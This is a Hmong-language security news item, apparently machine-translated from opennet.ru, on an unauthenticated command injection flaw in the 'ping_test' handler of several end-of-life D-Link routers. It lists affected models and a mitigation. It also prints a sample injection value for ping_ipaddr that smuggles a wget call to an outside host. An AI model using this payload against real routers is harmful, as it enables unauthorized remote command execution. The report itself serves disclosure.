Hauv D-Link wireless routers txaus ntshai vulnerability (), uas tso cai rau koj los tswj hwm cov lej ntawm lub cuab yeej sab nraud los ntawm kev xa cov lus thov tshwj xeeb rau tus "ping_test" handler, siv tau yam tsis muaj kev lees paub.
Interestingly, raws li cov firmware developers, hu "ping_test" yuav tsum tau ua tsuas yog tom qab authentication, tab sis nyob rau hauv kev muaj tiag nws yog hu ua nyob rau hauv txhua rooj plaub, tsis hais nkag mus rau hauv lub web interface. Tshwj xeeb, thaum nkag mus rau tsab ntawv apply_sec.cgi thiab dhau qhov "action = ping_test" parameter, tsab ntawv redirects mus rau nplooj ntawv pov thawj, tab sis tib lub sij hawm ua qhov kev txiav txim nrog ping_test. Txhawm rau ua tiav cov cai, lwm qhov tsis zoo tau siv hauv ping_test nws tus kheej, uas hu rau ping utility yam tsis tau kuaj xyuas qhov tseeb ntawm qhov chaw nyob IP xa mus kuaj. Piv txwv li, hu rau wget utility thiab hloov cov txiaj ntsig ntawm "echo 1234" hais kom ua rau tus tswv tsev sab nraud, tsuas yog qhia qhov parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$(echo 1234)".
Lub xub ntiag ntawm qhov tsis zoo tau raug lees paub tseeb hauv cov qauv hauv qab no:
- DIR-655 nrog firmware 3.02b05 lossis siab dua;
- DIR-866L nrog firmware 1.03b04 lossis siab dua;
- DIR-1565 nrog firmware 1.01 lossis siab dua;
- DIR-652 (tsis muaj ntaub ntawv hais txog cov teeb meem firmware versions muab)
Lub sijhawm txhawb nqa rau cov qauv no tau tas sijhawm, yog li D-Link , uas yuav tsis tso tawm tshiab rau lawv kom tshem tawm qhov tsis zoo, tsis pom zoo siv lawv thiab qhia hloov lawv nrog cov khoom siv tshiab. Raws li kev ruaj ntseg workaround, koj tuaj yeem txwv tsis pub nkag mus rau lub vev xaib interface kom ntseeg tau tus IP chaw nyob nkaus xwb.
Tom qab ntawd nws tau pom tias qhov tsis zoo kuj yog qauv DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 thiab DIR-825, npaj rau kev tso tawm tshiab uas tseem tsis tau paub.
Tau qhov twg los: opennet.ru